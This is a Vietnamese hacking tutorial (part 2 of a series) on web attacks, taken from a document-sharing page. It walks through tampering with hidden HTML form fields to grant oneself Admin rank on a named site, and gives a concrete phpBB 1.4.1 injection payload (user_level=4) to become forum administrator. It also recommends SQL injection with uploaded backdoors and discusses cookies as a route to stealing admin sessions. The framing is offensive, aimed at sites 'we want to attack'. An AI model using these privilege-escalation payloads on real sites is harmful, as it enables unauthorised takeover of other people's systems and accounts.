• Embed Doc
  • Copy Link
  • Readcast
  • Collections
  • CommentGo Back
Download
 
Các kiểu tấn công mạng ( phần 2)
trang này đã được đọc lần1-Tấn công vào vùng ẩn:Những phần bị dấu đi trong trang WEB thường chứa những thông tin về các phiên làmviệc của "clien",các phiên làm việc này thường ghi ỡ máy khách(clien) chứ không tổchức CSDL trên máy chủ,vì vậy ta có thể dùng chức năng "View Source" của trìnhduyệt để đọc phần bị dấu đi và từ đó có thể tìm ra sơ hở của trang WEB mà ta muốntấn công,ta có thể truy cập vào hệ thống của máy chủ này...Ví dụ có một website cho phép bạn sữa các cấp thành viên làm Mod, Member,Banned, nhưng không cho phép sửa lên thành Admin. Bạn thử view code, bạn có thểthấy như sau:(đây là ví dụ thôi tuỳ trường hợp)Chú thích.....<form action="" method="post" name="settings" >.....<select class=search name=status><option value=1>Moderator</option><option selected value=2>Member</option><option value=3>Banned</option></select>.....Hãy suy luận một tí nhé: Banned: value=3, Member: value=2, Moderator: value=1.Vậy thì Admin là mấy??? Có thể là 0 okie tiếp tục nào:Lưu lại trang setting member đó, edit HTML code trong đó, sửa lại đoạn Select:Chú thích.....<form action="" method="post" name="settings" >.....<select class=search name=status><option value=0>Admin </option><option value=1>Moderator</option><option selected value=2>Member</option><option value=3>Banned</option></select>.....Bây giờ hãy mỡ trang web đó lên và nhấn "submit" nào,vẩn không có chuyện gì xãyra cã sao vậy à quên xem chổ này:<form action="" thì khi nhấn "submit" thì nó truyền dữ liệu là các biến cho file nóđang load vậy ta hãy sữa lại một tí nhé ta copy url trên trình duyệt mà ta đang lưu fileđó ví dụ:http://www.tinhban.com/phpbb/member.php
 
vậy sẽ trỡ thành như sau:Chú thích.....<form action="http://www.tinhban.com/phpbb/member.php" method="post"name="settings" >.....<select class=search name=status><option value=0>Admin </option><option value=1>Moderator</option><option selected value=2>Member</option><option value=3>Banned</option></select>.....Bây giờ nhấn "submit" một lần nữa xem sao,bạn có thể thành công nếu như code ẩuvâng một số trường hợp áp dụng rất tốt đấyMột ví dụ điển hình nữa là ta có thể truy cập thành ADMIN của forum phpbb 1.4.1thông qua việc sữa đổi thông tin ẩn của trang web để truy cập vào hệ thống vớiquyền cao hơnVersion phpbb 1.4.1Đănng ký làm thành viên và vào profile và "View Source" và sữa đổi như sau: Thay thế dòng:<input type="checkbox" name="viewemail' value="1">thành<input type="text" name="viewemail' value="1',user_level=4'">Sữa <form action="./profile.php" method="post"> Thành <form action="http://target/phpbb2/profile.php" method="post">và nhấn "submit" >bạn trở thành admin của forum thật dể dàng phải không2-Can thiệp vào tham số trên URL:Đây là cách tấn công đưa tham số trực tiếp vào URL,kẽ tấn công có thể dùng các câulệnh SQL để khai thác CSDL trên server bị lổi,điển hình nhất là tấn công bằng lổi "SQLINJECT"(chú ý: Hầu hết các trang web của VN đều bị lổi này) cách khai thác lổi nàyhãy đọc kỹ bài viết của WINDAK và Nhóm Vicki và các bài viết liên quan của các thànhviên trong forum của chúng ta,tấn công kiểu này rất gọn nhẹ nhưng vô cùng hiệu quảchỉ dùng công cụ tấn công duy nhất là trình duyệt WEB và backdoor(up lên server) lờikhyên nên dùng minibrowse vàohttp://flash.to/nhomvickimà download vì nó không bịlổi time out.3-Tấn công dùng cookie:
 
Giới thiệu về cookiecookie là những phần dữ liệu nhỏ có cấu trú được chia sẻ giữa web site và browsercủa người dùng. cookies được lưu trữ dưới những file dữ liệu nhỏ dạng text (size dưới4k). Chúng được các site tạo ra để lưu trữ/truy tìm/nhận biết các thông tin về ngườidùng đã ghé thăm site và những vùng mà họ đi qua trong site. Những thông tin nàycó thể bao gồm tên/định danh người dùng, mật khẩu, sở thích, thói quen...cookie được browser của người dùng chấp nhận lưu trên đĩa cứng của máy mình, kophải browser nào cũng hỗ trợ cookie. Sau một lần truy cập vào site, những thông tinvề người dùng được lưu trữ trong cookie. Ở những lần truy cập sau đến site đó, website có thể dùng lại những thông tin trong cookie (như thông tin liên quan đến việcđăng nhập vào 1 forum...) mà người ko phải làm lại thao tác đăng nhập hay phải nhậplại các thông tin khác. Vấn đề đặt ra là có nhiều site quản lý việc dùng lại các thôngtin lưu trong cookie ko chính xác, kiểm tra ko đầy đủ hoặc mã hoá các thông tin trongcookie còn sơ hở giúp cho hacker khai thác để vượt qua cánh cửa đăng nhập, đoạtquyền điêu khiển site; cũng có nhiều site sử dụng những thông tin cá nhân của ngườidùng để phục vụ cho các mục đích khác như quảng cáo, hoặc thậm chí bán thông tincủa người dùng cho khách hàng khác (vd: nếu đột nhiên bạn nhận vài email quảngcáo mỗi ngày được gửi vào mail box của bạn mà ko biết tại sao, thì có thể là thông tincá nhân của bạn đã bị một site nào đó mà bạn từng xem sử dụng)Các thành phần của cookie Tên: do người lập trình web site chọnDomain: là tên miền từ server mà cooki e được tạo và gửi điĐường dẫn: thông tin về đường dẫn ở web site mà bạn đang xemNgày hết hạn: là thời điểm mà cookie hết hiệu lực\Bảo mật: Nếu giá trị này đựơc thiết lập bên trong cookie, thông tin sẽ đựơc mã hoátrong quá trình truyền giữa server và browser.Các giá trị khác: là những dữ liệu đặc trưng được web server lưu trữ để nhận dạng vềsau các giá trị này ko chứa các khoảng trắng, dấu chấm, phẩy và bị giới hạn trongkhoảng 4k.cookies của Netscape (NS) đặt trong file cookies.txt, trong thư mục cài đặt NS\Users\default (hoặc \User\Yourname), còn của IE thường đặt trong \Documents andSettings\Username\cookies\username@sitename.txt. (đối với win9x, thư mục cookiesnằm trong thư mục Windows/cookies)Netscape là trình duyệt đầu tiên sử dụng cookie, kế đến là IE của microsoft.Các thông tin khác về cookie thêm về cookie, các bạn có thể tham khảo thêm ởhttp://www.cooki_ecentral.com/Khai thác cookieƯu điểm của việc sử dụng cookie đã rõ ràng, việc lưu trữ và dùng lại các thông tinđăng nhập sẽ giúp người dùng tiết kiệm thời gian trong việc duyệt các web site. Tuynhiên, bên cạnh những lợi ích của nó. cookie là một trong những nguyên nhân gâytiết lộ thông tin riêng tư của người dùng. Những người biết tận dụng những thông tinnày có thể gây nên những hậu quả nghiêm trọng. VD: một hacker làm việc ở mộtngân hàng có thể tìm cách xem thông tin trong cookie của khách hàng và sử dụngthông tin này để truy cập vào acc của khách hàng đó. Hoặc hacker có thể tìm cáchtrộm cookie của admin 1 website và từ đó có thể dễ dàng chiếm được quyền điềukhiển site.Những browser hiện nay cho phép người dùng khóa cookie hoặc hỏi họ trước khi lưulại cookie trên hệ thống. Cũng có nhiều software giúp người dùng quản lý tốt cookie,giúp ngăn chặn hoặc cảnh báo những nguy cơ có thể gây hại.(Còn tiếp: tôi sẽ giới thiệu cho các bạn cách hack một vài kiểu forum bằng cách khaithác thông tin trong cookie và phương pháp lấy cookie từ một vài kiểu forum chưa fix)
of 00

Leave a Comment

You must be to leave a comment.
Submit
Characters: ...
You must be to leave a comment.
Submit
Characters: ...